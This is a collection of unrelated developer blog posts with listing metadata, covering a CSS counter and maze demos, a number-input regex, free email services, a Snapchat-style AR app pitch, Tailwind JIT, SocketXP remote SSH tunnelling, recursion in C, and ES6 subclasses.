[](https://4.bp.blogspot.com/-ZkIlr2bwj6s/XT7SHREGzNI/AAAAAAAAhps/6Rnn5ptGlsIz55i-84rNs9DjutImslYOgCLcBGAs/s1600/2019-07-29_1155.png)
I've just had a busy old weekend and managed to get my digital counter working with CSS animations. I have been wanting to do this for ages but haven't had the time to research the technique correctly. It's [here](https://annoyingmouse.js.org/WireFrameJS/000-MISCELLANEOUS/COUNTER/), and I'm quite pleased with the result despite it taking a shed load of tweaking to get right.
I've also caught up some on updated p5 implementations from WireFrame, and I've added three projects to the [site hosted by GitHub](https://annoyingmouse.js.org/WireFrameJS/), all to do with mazes. The [first](https://annoyingmouse.js.org/WireFrameJS/018-MAZE/) uses an algorithm to generate a maze, and I got lost in the [C implementation](https://github.com/Wireframe-Magazine/Wireframe18/tree/master/maze-algorithms) but found [a set of videos](https://www.youtube.com/watch?v=HyK_Q5rrcr4) from [The Coding Train](https://thecodingtrain.com/) that went through the steps required. I've pretty much stolen them but made them a little more ES6y. The [second](https://annoyingmouse.js.org/WireFrameJS/018-MONSTERMAZE/) draws the view of a character navigating a maze, and I'm impressed with the cheating in terms of the images used to illustrate the perspective required. The [third](https://annoyingmouse.js.org/WireFrameJS/015-ANT_ATTACK/) and final one also cheats by using images to build up a semi-3D illustration of a landscape and was lots of fun (you can navigate using the arrow keys)! | mouseannoying |
329,546 | In search of the ultimate number regex | I was recently working on a number input field and ran into the age old problem of validating the use... | 0 | 2020-05-07T11:06:30 | https://dev.to/ryandunn/in-search-of-the-ultimate-number-regex-3kk | javascript, ux | I was recently working on a number input field and ran into the age-old problem of validating the user input to ensure a valid numerical value. This is simple enough if you only validate once the complete value has been entered, but not so much while the user is still typing.
We need the user to be able to input a `-` on the way to typing `-1` and to be able to type `1.` on the way to typing `1.23`, but remove any non-numerical characters smoothly. I was sure this could be accomplished with a single regex and set out to do it.
## Requirements
1. Remove any characters that are not numerals, dots or dashes
2. Remove any dashes not at the beginning of the string
3. Allow one dot, remove any additional dots
This should also result, at least in JavaScript, in a value that can almost always be correctly parsed with `parseFloat` without any `NaN` hijinks.
## Filtering non-numeric characters
Let's go ahead and try to format this horrible mess into a valid potential numeric value:
``` javascript
const n = "-a[b1-2.cd.-e34--.5*(a67.ac&";
```
The first part of the problem is simple, filter any characters that aren't numbers, dashes or dots:
``` javascript
n.replace(/[^\d.-]/g, ""); // output "-1-2..-34--.567."
```
This looks mysterious if you haven't ever broken it down into pieces before, but I'll explain it bit by bit. We tell our match filter to find every match `/g` from a whitelist group `[ ]` that is not `^` a digit `\d`, a dot `.`, or a dash `-`. We use `replace` to replace all matches with nothing.
Note: normally the dot character would need escaping (`/\./g` matches all dots) but doesn't within the group.
## Removing improper dashes
Next we need to remove any dashes that aren't at the beginning of the string. This is a little more esoteric:
``` javascript
n.replace(/(?!^)-|[^\d.-]/g, ""); // output "-12..34.567."
```
Here we're using a negative lookahead `(?! )` to tell our matcher to fail if it finds the following match at the first-character position `^`, and then to match all dashes `-`, ie: all dashes that are not the first character. Then we use the or operator `|` to tell it to also search for anything from our previous matcher: anything that is not a digit, dot, or dash. Getting closer.
## Removing additional dots
The final problem here is one that _is_ solvable in a one-line regex, but unfortunately the required feature isn't supported by several widely used browsers. We need a positive lookbehind, which isn't supported in Firefox, Safari, or IE11 as of the time of writing. Nevertheless, here is the solution, courtesy of a colleague of mine, which will work in any environment that does support it:
``` javascript
n.replace(/(?<=\..*)\.|(?!^)-|[^\d\.-]/g, ''); // output "-12.34567"
```
Here we use a positive lookbehind `(?<= )` to tell our matcher to succeed only if it finds at least one dot `\..*` behind it. We combine it with the or operator `|` to the rest of our filters and get the final result.
Unfortunately this won't work in several major browsers, so for now I have a short function to handle it:
``` javascript
const formatNumber = (n) => {
// replace all non numeric, dots or dashes that aren't the first char
const filtered = n.replace(/(?!^)-|[^\d.-]/g, "");
// remove all but the first dot
const [first, ...others] = filtered.split(".");
const newValue = others.length
? [first, others.join("")].join(".")
: filtered;
return newValue;
};
```
## Final validation
The above function is perfect for validating a changing user input, but when it comes to validating the final value and converting it to a float, we need to do a small final check.
Running this filter over any string results almost always in a value that can be parsed correctly with `parseFloat`. The exceptions are resulting strings containing only `-`, `.` or `-.` which we can simply filter out and replace with zero. Or do a simple `NaN` check:
``` javascript
const getNumeric = (str) => {
const n = parseFloat(formatNumber(str));
return isNaN(n) ? 0 : n;
};
```
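To make the behaviour concrete, here is a self-contained sketch combining the pieces above (my own restatement in plain JavaScript, with the type annotations dropped so it runs as-is):

```javascript
const formatNumber = (n) => {
  // drop non-numeric characters and any dash that isn't the first character
  const filtered = n.replace(/(?!^)-|[^\d.-]/g, "");
  // keep only the first dot
  const [first, ...others] = filtered.split(".");
  return others.length ? [first, others.join("")].join(".") : filtered;
};

const getNumeric = (str) => {
  const n = parseFloat(formatNumber(str));
  return isNaN(n) ? 0 : n;
};

console.log(formatNumber("-a[b1-2.cd.-e34--.5*(a67.ac&")); // "-12.34567"
console.log(formatNumber("1.2.3")); // "1.23"
console.log(getNumeric("-."));      // 0
```

The last case shows why the final `NaN` check matters: a lone `-`, `.`, or `-.` survives the filter but cannot be parsed as a number.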
| ryandunn |
329,897 | Best free services for sending transactional emails | When you start developing a web application or service, you will probably need to... | 0 | 2020-05-14T19:54:50 | https://marquesfernandes.com/melhores-servicos-para-enviar-e-mails-transacionais-gratuitos/ | self, tech, email, emails | ---
title: Best free services for sending transactional emails
published: true
date: 2020-05-07 19:46:37 UTC
tags: Self,Tech,email,emails
canonical_url: https://marquesfernandes.com/melhores-servicos-para-enviar-e-mails-transacionais-gratuitos/
---
When you start developing a web application or service, you will probably need to communicate with your users via email. You can easily build your pilot project using personal email services, sending over SMTP through providers like Gmail, but over time, as sending volume grows, these services can bring limitations such as sending quotas and problems with your emails landing in spam.
So if your application is starting to send more than a few hundred emails, it is probably time to look for a specialized service. Besides handling the whole delivery process, many of these services offer more advanced tools for send control, delivery monitoring, open tracking, and other very useful statistics.
## What is a transactional email?
[Transactional emails](https://marquesfernandes.com/o-que-e-um-email-transacional/) are a type of automated email between a sender and a recipient. Unlike promotional emails, a transactional email is triggered by events or interactions with a service or platform, not with a company itself. They are usually pre-programmed and fired after an interaction, such as creating an account that requires email verification. You can understand the use of these emails better by reading this [post](https://marquesfernandes.com/o-que-e-um-email-transacional/).
## Best transactional email services
Choosing a service that meets your demand is very important. Since this functionality is part of your application's core, it is crucial that there are no obstacles to using it and that the cost and available features align with your project.
1. [Amazon SES](#amazon-ses)
2. [SendGrid](#sendgrid)
3. [Mailgun](#mailgun)
4. [Mailjet](#mailjet)
5. [SendinBlue](#sendiblue)
## 1. [Amazon SES](https://aws.amazon.com/pt/ses/)
[](https://aws.amazon.com/pt/ses/)
Amazon Web Services offers many cloud services, among them **Amazon SES** for sending transactional emails. Backed by all of AWS's infrastructure and reliability, it has very affordable prices. It is a robust solution for those with some technical experience; the service does not provide statistics on its own, so you need to connect it to another service, [AWS SNS](https://aws.amazon.com/pt/sns/), to track your sending metrics.
**Free plan:** 62,000 emails per month.
## 2. [SendGrid](https://sendgrid.com/)
[](https://sendgrid.com/)
**SendGrid** is one of the most popular services, with more than 80,000 paying users and over 60 billion emails sent per month. It offers a robust interface for tracking, monitoring, and analyzing your sends, as well as a very well-documented API to integrate with your application.
**Free plan:**
- 40,000 emails in the first month, then 100 emails per day.
- APIs, SMTP Relay and Webhooks
- Email template editor
- Sending statistics
## 3. [Mailgun](https://www.mailgun.com/)
[](https://www.mailgun.com/)
**Mailgun** is a complete solution for the whole email ecosystem, from sending to validation. It has a very friendly interface, complete statistics, and is a well-established tool in the market.
**Free plan:**
Although it is not a 100% free solution, it offers a free plan for the first 3 months and then an on-demand flex plan.
- Email APIs, SMTP Relay and Webhooks
- Suppression Management
- Tracking and statistics
- 99.99% Uptime SLA
## 4. [Mailjet](https://www.mailjet.com/)
[](https://www.mailjet.com/)
**Mailjet** is another well-established service in the market, serving large companies such as Microsoft and MIT. Its platform is extremely friendly, with advanced statistics and well-documented APIs to integrate with your application.
**Free plan:**
6,000 emails per month / 200 emails per day
- Unlimited contacts
- APIs, SMTP Relay, Webhooks
- Email template editor
- Advanced statistics
## 5. [SendinBlue](https://pt.sendinblue.com/)
[](https://pt.sendinblue.com/)
**SendinBlue** is a marketing-focused service with an extremely friendly platform.
**Free plan:**
300 emails per day and unlimited contacts
The post [Best free services for sending transactional emails](https://marquesfernandes.com/melhores-servicos-para-enviar-e-mails-transacionais-gratuitos/) appeared first on [Henrique Marques Fernandes](https://marquesfernandes.com). | shadowlik |
338,700 | Planning to develop an app like Snapchat? Here is all you need to know
| Snapchat is a popular and most admired augmented reality application. AR has seen a drastic growth si... | 0 | 2020-05-19T07:08:40 | https://dev.to/sheetalrawat18/planning-to-develop-an-app-like-snapchat-here-is-all-you-need-to-know-2lpe | hiresoftwaredeveloper, softwaredevelopmentcompany | Snapchat is a popular and much-admired augmented reality application. AR has seen drastic growth since its first system development in the 1990s. It has been projected that by 2023, [AR market revenue](https://citrusbits.com/stats-and-facts-about-augmented-reality/) will reach $61.39 billion USD.
AR-enabled apps are capable of creating an interactive experience with physical elements. In a live view, **AR adds a few digital elements**. For example, the IKEA app can show how furniture will look at your place, and Snapchat filters change the way you look.
This is done with the help of a smartphone's camera. The digital elements are added to the view captured by the camera lens. ***Some popular AR apps like Snapchat are Pokemon Go, Google Maps, IKEA, etc.***
This technology has the capability to interact with users and make highly interactive apps, so there are very few chances that an AR app will fail. If you are an entrepreneur considering developing an app like Snapchat, then it is a smart vision, I must say.
This is because when an app provides interactivity, it also generates revenue. Here are the **three questions that every entrepreneur planning to build an app like Snapchat raises:**
*How does an app like Snapchat work?*
*How does an app like Snapchat make money?*
*What are the top AR tools to develop an app like Snapchat?*
**Here are the answers to all these queries in detail.**
# How does an app like Snapchat work?
Snapchat is a multimedia messaging app with 210 million daily active users. It is highly popular among the younger generation. It was launched in 2011 with limited features, but a number of features have been added since then. Here is a list of the Snapchat features that form its core functionality:
**Message exchange:** It is not like your regular messaging app; it lets its users send multimedia messages called snaps.
**Self-destructing messages:** This feature is an important reason behind its popularity. As soon as the user views a message, it gets deleted. If the user does not view the snap, the server deletes it after 30 days.
**Stickers:** Snapchat has 200 stickers, and they have become an integral part of the app. You can design your own stickers too.
**Geolocation:** You can share your live location with your friends. The location will appear on the Snap Map.
**Finding and adding friends:** To grow your social network, you can add friends on Snapchat. Apart from finding friends through phone numbers or usernames, you can use some smart options as well: Snapcodes are personalized QR codes that can be scanned to follow a user, and the Add Nearby option lets users find other users around their location.
**Filters:** This is the most popular feature of the app, and it is based on active shape models. The lens detects a person's face by marking the facial borders, then aligns the facial borders with a provided image using a machine learning algorithm. Moreover, a 3D mask allows users to fit accessories to their face.
**Video and audio calls:** You can connect with friends and family with just a tap on the video call or audio call button.
**Stories:** Like other popular apps such as WhatsApp, Instagram, and Facebook, you can post stories that vanish in 24 hours. Users share images or videos via stories with their friends. Live Stories were added later, letting Snapchatters contribute snaps to the same story while they are at the same event.
# How does an app like Snapchat make money?
Every app has a goal to earn money, and Snapchat earns a lot. Here are its channels for revenue generation:
**In-between snap ads:** A 10-second promotional video is shown to users in between snaps. Users can swipe up to read the blog or watch the full video.
**Sponsored lenses:** Businesses have the option to advertise through their customized lenses. They can target the location of their advertisement's reach.
**Sports partnerships:** The app develops partnerships with sports organizations to reach audiences and attract them to sports events.
**In-app purchases:** There is an option to purchase additional features, for example the option to replay a snap that the user has already seen.
# What are the top AR tools to develop an app like Snapchat?
To develop an app, you are required to use some programming tools. Here are some software development kits which you can use, through a [software consultant company](https://www.pixelcrayons.com/technology-consulting-services?utm_source=dev_counsultant&utm_medium=rawat&utm_campaign=dev_counsultant), to develop an app like Snapchat:
## Vuforia:
This tool has many exciting features and a free beta version. Some features are available with a watermark; the paid version has many more. It is compatible with many platforms, such as iOS, Windows, and Android. Data can be stored in the cloud or in local storage. The USP of this tool is its usability for both 2D and 3D with the Vuforia object scanner.
## Apple ARKit:
It has gained immense popularity and is one of the best tools for AR app development, but its use is restricted to iOS devices only. Its visual-inertial odometry (VIO) can be used to track the environment with great precision. It can be combined with engines like Unreal and Unity to detect 2D objects, and its own face-tracking feature is used to track 3D characters.
## Google ARCore:
Like every other Google product, it comes with polish. It offers an advanced user interface and allows AR app developers to create both Android and iOS apps. It is also compatible with Unity, Unreal, and Java/OpenGL.
# Conclusion:
Reading about how an app like Snapchat works and how it makes money, it can be concluded that building an app like Snapchat is a great idea. You can reach an optimum level of user interactivity, earn revenue, and reach a wide audience with the help of these apps.
You can [hire app developers](https://www.pixelcrayons.com/hire-app-developers?utm_source=dev_hireapp&utm_medium=rawat&utm_campaign=dev_hireapp) and share your custom requirements with **software consulting services**. They will find which AR tool best suits your application. I hope that, after reading this article, you have chosen the features and AR SDK for your next AR app development project.
| sheetalrawat18 |
670,024 | How to use the Tailwind JIT compiler | Recently, Tailwind v2.1 was released with the JIT compiler included. The JIT (Just In Time) compiler... | 0 | 2021-04-18T09:28:35 | https://www.jeroenvanrensen.nl/blog/tailwind-jit-compiler | tailwindcss | Recently, Tailwind v2.1 was released with the JIT compiler included. The JIT (Just In Time) compiler only generates CSS that you actually use, instead of all sorts of classes that you (almost) never use, like `subpixel-antialiased`, `place-self-start`, and `backdrop-brightness-95`. And even better, compiling your CSS is extremely fast, at about 100ms.
If you don't know what Tailwind CSS is or how to use it, [read my post](https://www.jeroenvanrensen.nl/blog/tall-stack) about it.
## The Problem
The main problem with Tailwind CSS was the large development file size. That file includes lots of classes, most of which you will never use. To keep it manageable, not all spacing variants (like `mt-35`) are included, and special variants like `group-focus` and `disabled` are not enabled by default.
When going into production, you had to run `npm run prod` to purge all unused CSS classes. That means your deployment process takes more time, so users have to wait longer before they can use your website.
## The solution
The team behind Tailwind CSS has created the JIT compiler to solve this problem. Once you make a change in one of your files, your CSS gets recompiled with only the classes you actually use.
Compiling CSS has become a lot faster. Whereas it used to take a few seconds, it now takes only about 100ms, or according to [the official announcement](https://blog.tailwindcss.com/just-in-time-the-next-generation-of-tailwind-css), as little as 3ms.
## How to use it
If you want to use the JIT compiler, follow these steps:
First, install Tailwind v2.1:
```
npm install -D tailwindcss@latest postcss@latest autoprefixer@latest
```
Next, add this to your `tailwind.config.js` file:
```js
// tailwind.config.js
module.exports = {
mode: 'jit',
purge: [
'./resources/**/*.blade.php'
],
//
}
```
Finally, run `npm run watch`, and keep it running.
## Benefits
Using the JIT compiler has more benefits:
- **Compiling CSS is fast**: whereas it used to take a few seconds to compile your CSS, now it gets done within a few milliseconds.
- **All variants are enabled**: you can use variants like `group-focus`, `active` and `disabled` without adding anything to your configuration file.
- **Browsers perform better**: when you have a very large CSS file, browsers become slow. When using the JIT compiler, only used CSS will be generated, so inspecting HTML/CSS is quicker.
- **You don't have to worry about purging**: sometimes, when you are purging for production, some classes don't get purged, and your design breaks. When using the JIT compiler, purging is done when developing, so you have the same file. | jeroenvanrensen |
357,190 | Secure remote SSH access to your IoT devices & Raspberry Pi fleet using SocketXP. | In this article, we'll discuss how to use SocketXP IoT Remote SSH Access solution to SSH into your... | 0 | 2020-06-17T04:08:29 | https://dev.to/gvelrajan/secure-remote-ssh-access-to-your-iot-devices-raspberry-pi-fleet-using-socketxp-3aa4 | iotremotessh, iotconnectivity, managingraspberrypifleet, securetunnel | In this article, we'll discuss how to use [SocketXP IoT Remote SSH Access solution](https://www.socketxp.com/iot/remote-access-iot-ssh-over-the-internet/) to SSH into your IoT or Raspberry Pi fleet.
<h2>What is SocketXP</h2>
[SocketXP](https://www.socketxp.com) is a <code>cloud based [secure SSL/TLS reverse tunnelling service](https://www.socketxp.com/iot/create-secure-reverse-ssh-tunnel-to-raspberry-pi/)</code> that provides remote SSH access to your IoT devices.
SocketXP solution does not require any changes to your firewall or gateway router configuration. SocketXP creates a [secure SSL/TLS reverse tunnel through your firewall and NAT and over the internet](https://www.socketxp.com/iot/create-secure-reverse-ssh-tunnel-to-raspberry-pi/) to your IoT devices for remote SSH access.
SocketXP is a cloud based massively scalable IoT Gateway solution that can provide connectivity to more than 10,000 IoT devices for a single user account.
<code>SocketXP solution is trusted by thousands of end users including small and medium size enterprises, business owners, developers and Raspberry Pi geeks and DIY kind of folks.</code>
<h2>How SocketXP IoT Remote SSH solution works</h2>
Install a simple, secure and lightweight SocketXP IoT agent on your IoT device (or Raspberry Pi). The SocketXP agent will securely connect (using an SSL/TLS tunnel) to the SocketXP IoT Cloud Gateway using an authentication token. You can then SSH into your device from the comfort of your browser by visiting the SocketXP IoT Cloud Gateway Portal.

<h3>Step 1: Download and Install</h3>
Download and install the SocketXP IoT agent on your IoT device or Raspberry Pi device from <a href="https://www.socketxp.com/download/">here</a>.
<h3>Step 2: Get your Authentication Token</h3>
Sign up at https://portal.socketxp.com and get your <code>authentication token</code>.

Use the following command to login to the SocketXP IoT Cloud Gateway using the auth token.
<pre>
$ socketxp login [your-auth-token-here]
</pre>
<h3>Step 3: Create SocketXP SSL Tunnel Endpoint for Remote SSH</h3>
Use the following command to create a secure and private SSL tunnel endpoint at the SocketXP IoT Cloud Gateway.
<pre>$ socketxp connect tcp://localhost:22
TCP tunnel [test-user-gmail-com-34445] created.
Access the tunnel using SocketXP agent in IoT Slave Mode
</pre>
SocketXP doesn't create any public TCP tunnel endpoints that can be connected to by any SSH client on the internet.
SocketXP private tunnel endpoints are not exposed to the internet and can be accessed only using the SocketXP agent (using the auth token of the user) or through the XTERM terminal in the SocketXP Portal page using a web browser.
Follow the steps below to access your IoT or RPi device from the comfort of your browser. We use XTERM to connect to your IoT devices from our portal page via a browser, from any device: laptop, desktop, tablet or phone, on Android or iOS.



<h3>SocketXP Single-Touch Installation Option:</h3>
The 3-step instructions explained above for setting up SocketXP on your IoT device become tedious if you have thousands of RPi devices to install, configure and manage.
With this in mind, the SocketXP IoT Solution also provides a single-touch installation for installing and configuring the SocketXP IoT Agent on a large number of IoT or RPi devices.
Copy and paste the single command below into the terminal of your IoT devices and it will install, configure and set up the agent, bringing the devices online in the SocketXP portal.

<h3>Configuring SocketXP agent to run in slave mode</h3>
First download and install the regular SocketXP agent software on your accessing device (such as a laptop running Windows or Mac OS). Next, configure the agent to run in slave mode using the command option <code>--iot-slave</code> as shown in the example below. Also, specify the ID of the IoT device you want to connect to, using the <code>--iot-device-id</code> option.
<pre>
$ socketxp connect tcp://localhost:3000 --iot-slave --iot-device-id "DEV0000000123"
Listening for TCP connections at:
Local URL -> tcp://localhost:3000
</pre>
<h3>Accessing the IoT device from your laptop</h3>
Now you can access your IoT device’s SSH server using the above SocketXP local endpoint, instead of a public endpoint, as shown below.
<pre>
$ ssh -i ~/.ssh/john-private.key john@localhost -p 3000
</pre>
We recommend using SocketXP Private TCP Tunnels for all your remote IoT device access needs. Public TCP tunnels can be used for hobby use cases, quick testing or one-off access.
<br><br>
<h2>SocketXP Scaling and Performance</h2>
SocketXP IoT Gateway easily supports more than 10K devices per customer account. SocketXP IoT Gateway also has the built-in capability to grow on demand, as it is a cloud-based SaaS service.

<br>
<h2>Conclusion:</h2>
The solution discussed in this article is a secure method to remote SSH into your home or office computer because the data is encrypted using SSL.
SSH uses the same cryptography technology used by banks and governments to exchange highly confidential data over the internet.
The data transferred gets encrypted end-to-end between the SSH client and the SSH server.
SocketXP has no way to decrypt or eavesdrop your encrypted data without knowing your SSH private keys. SocketXP merely acts as an online [reverse proxy server](https://www.socketxp.com/iot/create-secure-reverse-ssh-tunnel-to-raspberry-pi/) for your encrypted data traffic transmitted through the SSH connection.
<b>This article was originally published at: <a href="https://www.socketxp.com/iot/remote-access-iot-ssh-over-the-internet/">SocketXP IoT Remote SSH Access Raspberry Pi Remote Control</a></b> | gvelrajan |
358,103 | Understanding recursions and memory | Recursion is a very well-known concept in modern high-level programming languages. In this post, we w... | 0 | 2020-06-18T15:58:22 | https://dev.to/therise3107/understanding-recursions-and-memory-4eph | recursion, c, memory | Recursion is a very well-known concept in modern high-level programming languages. In this post, we will try to analyze the recursion in C language. I am pretty sure learning in C should be sufficient to understand this topic's implementation in other languages as well. Well, that's being said recursion are language agnostics just like loops but there is one catch; language should have some support for recursion optimization via tail recursion. In present time, every language has it.
Just to give a quick refresher, recursion or recursive function is the function that returns itself with new computed parameters. The incoming parameters determine the condition for the next call; if the terminating condition is met then, it will return some value else the cycle continues.
A recursive function has one terminating condition and, two phases: winding and unwinding. Let's understand this by a simple expression
```C
// Calculates the sum of the integers from 1 to num
int recursive_sum(int num) {
  if (num == 1) {
    return num;
  } else {
    return num + recursive_sum(num - 1);
  }
}
```
Which is simply doing something like this:
```
F(5) = 5 + F(4); winding start
       4 + F(3);
       3 + F(2);
       2 + F(1); winding end
       1; terminating condition return
       2 + 1; unwinding start
       3 + 3;
       4 + 6;
F(5) = 5 + 10; unwinding end
```
or in simple terms: F(x) -> F'(F''(x''));
Recursion can be subdivided into two parts:
1. Basic/traditional recursion
2. Tail recursion
Basic recursion has both a winding and an unwinding phase, while tail recursion has only a winding phase. To fully comprehend recursion, we will look into how memory is utilized in a C program.
Whenever we start the execution of our program, memory is allocated for computations. A program can be divided into segments like variables, loops, constants, globals, functions, instructions, and so on. The memory semantics are different for each segment. The compiler utilizes different regions of memory to execute the program; the regions are:
1. Code area
2. Static data area
3. Stack
4. Heap
**Code area** contains the instructions which your program executes as it advances.
**Static data area** stores the data that is declared by the program for the duration of its life cycle. Global variables and read-only constants reside here, along with globals that can be modified during runtime.
**Stack** region is similar to the Stack data structure; it follows the LIFO (last in, first out) principle. The stack stores the information about a function call for the duration of its execution. Whenever we call a function, the compiler allocates some storage on the stack in a region called an activation record, or simply a stack frame. In simple terms, the stack is an array where each block is a stack frame that stores some information about the function. The top of the stack is tracked by the stack pointer, which is updated to refer to the most recent activation call.
The stack frame can be further divided into five separate regions to store different information about an activation call.
1. Incoming parameters
2. Return value
3. Temporary storage
4. Saved state information
5. Outgoing parameters
Incoming parameters are the parameters provided in the activation call. Outgoing parameters are the parameters that are passed onto the next call to function(next activation call). Temporary storage stores the data used during the execution. Saved state information is the saved information for reference when the activation terminates. The return value is simply the return of a function.
**Heap** or dynamic memory is the memory allocated at runtime. When we cannot pre-allocate storage for our program, we may request, reserve, and free memory as needed. In C, malloc, calloc and realloc are used for memory allocation and free to deallocate, while most other programming languages do it by default using something like ARC (Automatic Reference Counting: when an object's reference count drops to 0, its memory is freed).
In C, memory leaks happen if we forget to call free. In other languages like Swift, a memory leak will happen if there is a reference cycle, i.e. a class instance referring to itself; in that case the reference count never drops to 0, even when nothing else uses the object. There are ways to solve this in the respective languages, but they are beyond the scope of our main topic. The stack has its own failure mode as well, which we will look at next: how recursion can lead to a stack overflow.
Values copied by reference generally live in dynamic memory, while values copied by value live on the stack; class instances (not available in C) are stored on the heap and struct values on the stack. Accessing the heap is costlier than accessing the stack, so a little optimization trick is to use a struct.
**Coming back to recursion**, each call of our recursive function gets its own stack frame, along with the information associated with it. Now, let's look at some simple recursive code:
```C
#include <stdio.h>

int recursive_sum(int num) {
  if (num == 1) {
    return num;
  } else {
    return num + recursive_sum(num - 1);
  }
}

// Tail-recursive version: the running total is carried in an accumulator.
// Note: C has no default arguments, so the initial sum is passed explicitly.
int t_recursive_sum(int num, int sum) {
  if (num == 0) {
    return sum;
  } else {
    return t_recursive_sum(num - 1, sum + num);
  }
}

int main() {
  printf("Basic: %d\n", recursive_sum(5));
  printf("Tail: %d\n", t_recursive_sum(5, 0));
  return 0;
}
```
`recursive_sum` and `t_recursive_sum` both return the same value; essentially they are doing the same thing, and what differs is how they do it.
Let's say F(x) is recursive_sum(x); then F(5) unfolds as:
```C
F(5) -> 5 + (F(4) -> 4 + (F(3) -> 3 + (F(2) -> 2 + (F(1) -> 1))))
F(5) = 5 + F(4); // winding start
4 + F(3);
3 + F(2);
2 + F(1); // winding end
1; // terminating condition
2 + 1; // unwinding start
3 + 3;
4 + 6;
F(5) = 5 + 10; // unwiding end
```
F'(x) is t_recursive_sum(x); then F'(5, 0) unfolds as:
```C
F'(5, 0) -> F(4, 5) -> F(3, 9) -> F(2, 12) -> F(1, 14) -> F(0, 15)
F(5, 0) = F(4, 5); // winding start
F(3, 9);
F(2, 12);
F(1, 14);
F(0, 15);
15; // final return
no unwinding
```
Both F(x) and F'(x) do winding, but only F(x) does unwinding. This means that if there were n calls until the first actual return (notice how many parentheses our F(5) has), there will be n more returns before F(x) finally finishes its execution.
Since F(5) does some computation on each return, the stack frames used for F(4)…F(1) cannot be freed until their results are consumed. So if there are n calls, there are n live stack frames, each still holding all the information about its function's variables and state. This means our stack grows in size, but what if it just cannot grow any more? Well, it will throw an error famously known as a *Stack Overflow*.
So our basic recursion is not only slow but dangerous as well. Tail recursion just returns the next call and finishes its own execution, so the function's memory can be freed as soon as it returns. To make it clearer, think of it like this: in basic recursion a frame cannot be freed early because it still has work pending, something like constant + F'(x), so the deepest function or stack frame gets freed first.
With tail recursion, the stack pointer never needs to advance to a new frame: as soon as the function makes its tail call, its own memory can be released, because the next call is independent of its parent, so we do not need to hold on to that memory. A compiler that performs tail-call optimization can simply reuse the current stack frame for the next call. This means more optimization and no overflow :).
In conclusion, recursion can be avoided by using iteration, but if you are using it, try to use tail recursion. You can practice recursion by looking into greedy algorithms or divide and conquer (does binary search ring a bell?). If you want to see recursion more interactively you can check [Algorithm Visualizations](https://www.cs.usfca.edu/~galles/visualization/RecFact.html) and how basic recursion is significantly improved by using iteration and memoization in the case of Fibonacci numbers.
Thanks for reading the post, please note this is by no means a deep dive into the memory topic but just an introduction. My goal was to understand how recursions and memory work for code optimization and how recursion is analogical with iterations, so I wrote this one to share whatever less I know. Have a good day :) | therise3107 |
383,465 | Inheritance and SubClasses Using ES6 | Javascript Inheritance and SubClasses In Javascript there are many different patterns to f... | 0 | 2020-07-06T04:00:05 | https://dev.to/cschratz/inheritance-and-subclasses-using-es6-3ncl | javascript, beginners, subclasses, es6 | ## Javascript Inheritance and SubClasses
In Javascript there are many different patterns to follow when going about object instantiation. Each of these patterns (functional, functional-shared, prototypal and pseudoclassical) follows specific syntax guidelines, and the pattern one chooses impacts how object inheritance is handled. If you're unsure of how instantiation patterns work, [here](https://dev.to/mconner89/a-quick-guide-to-instantiation-in-javascript-6n) is a great article covering the topic. When ECMAScript 2015 (ES6) was released, it introduced the ability to create subclasses using the keywords `extends` and `super`, both of which will be discussed later. When an object is a subclass of another object, it inherits the methods and properties of the 'parent' object and has access to them. Now let's discuss how pseudoclassical instantiation, subclassing and object inheritance work with ES6!

## The class Keyword
When using ES6 instantiation, the keyword 'class' is used to declare a new object type along with its constructor. Since we're using ES6 we can create object methods right within the class declaration, using less code and creating a more readable object. Below is the format that ES6 pseudoclassical instantiation follows. Note the use of the 'class' keyword at the start of the declaration.
```javascript
class Animal {
constructor(name, favFood) {
this.name = name;
this.food = favFood;
}
identifier() {
return `I am ${this.name}`;
}
}
```
Now that we have our 'parent' class, we can start creating subclasses based off of the parent object. In order to create a subclass we need to use the keyword 'extends', which links the new subclass to the parent class so that the subclass inherits the parent's methods and properties. While extends does most of the heavy lifting, there's still a bit of work that needs to be done on our end: if we want the subclass to add its own properties, we have to define a constructor function within the new class being created. Below you'll see the structure of our subclass using the extends keyword and creating the constructor function within.
```javascript
class Dog extends Animal {
constructor() {
// What Goes In Here?
};
}
```
## The super Keyword
Now our new subclass is looking pretty good, but what do we do with the constructor function within it? We'll invoke the super keyword, which calls the parent class's constructor function. This allows us to set up the same properties from the parent class on the subclass. Let's take a look at how that works down below.
```javascript
class Dog extends Animal {
constructor(name, favFood, sound) {
// passing the parameters of the parent class
// plus the parameter sound
super(name, favFood);
this.sound = sound;
}
}
```
Now that we've successfully created our subclass from the parent class, let's look at how we can add methods to the subclass as well as overwrite previous methods inherited from the parent class, while maintaining those within the parent class. This is one of the great uses of subclasses within Javascript!
```javascript
class Dog extends Animal {
constructor(name, favFood, sound) {
super(name, favFood);
this.sound = sound;
}
makeNoise() {
// Adds a makeNoise method to our dog class!
return `${this.sound} ${this.sound}`;
}
}
// Creating a subclass called Cat from our Dog subclass
class Cat extends Dog {
constructor(name, favFood, sound, action) {
super(name, favFood, sound);
this.action = action;
}
makeNoise() {
// Overwriting the makeNoise function for the Cat subclass
return `Meow!`
}
catThing() {
// Adding a new catThing class that returns this.action
// as a string
return `${this.action}`;
}
}
```
Look at all we've done so far! We have an Animal class that is the parent class, a Dog class that is a subclass of the Animal class, and a Cat class that is a subclass of the Dog class. Let's look at how each of these subclasses operate and inherit the methods and properties of their parent class!
```javascript
const bat = new Animal('Dracula', 'blood');
console.log(bat.name); // Prints 'Dracula' to the console
const doggie = new Dog('Spot', 'bones', 'bark');
doggie.identifier(); // returns 'I am Spot' // We still have the
// identifier method in our Dog subclass!
doggie.makeNoise(); // Returns 'bark bark'
// Our makeNoise function in our Dog subclass
// still works as intended even though we
// overwrote it within the Cat subclass!
const kitty = new Cat('Sabrina', 'fish', 'meow', 'purrr');
kitty.makeNoise(); // Returns 'Meow!'
kitty.catThing(); // Return 'purrr'
```
As you can see in the code lines above as we create new subclasses from a parent class, each subclass inherits what the parent class has and then whatever methods or properties that you designate within the constructor function. Using the ES6 pattern for creating subclasses is a great option for a programmer, and I highly recommend getting comfortable with the syntax and process because it is very useful.
## Conclusion
We've covered the process of creating classes and subclasses within Javascript using ES6. As you've seen, this method of class creation allows you to easily inherit properties and methods from a parent class using the extends and super keywords. This method is extremely useful and gives you the freedom to modify subclasses of the parent depending on how you want them to operate. Using the ES6 syntax for creating subclasses saves lines of code and keeps your class hierarchy readable, which are both great benefits. ES6 is supported by all current browsers, and using it while creating classes and subclasses is a great tool in your programmer's toolbox, so get out there and start putting it to use in your code!
P.S. Don't forget to use the 'new' keyword when creating new instances of your class and subclasses!
| cschratz |
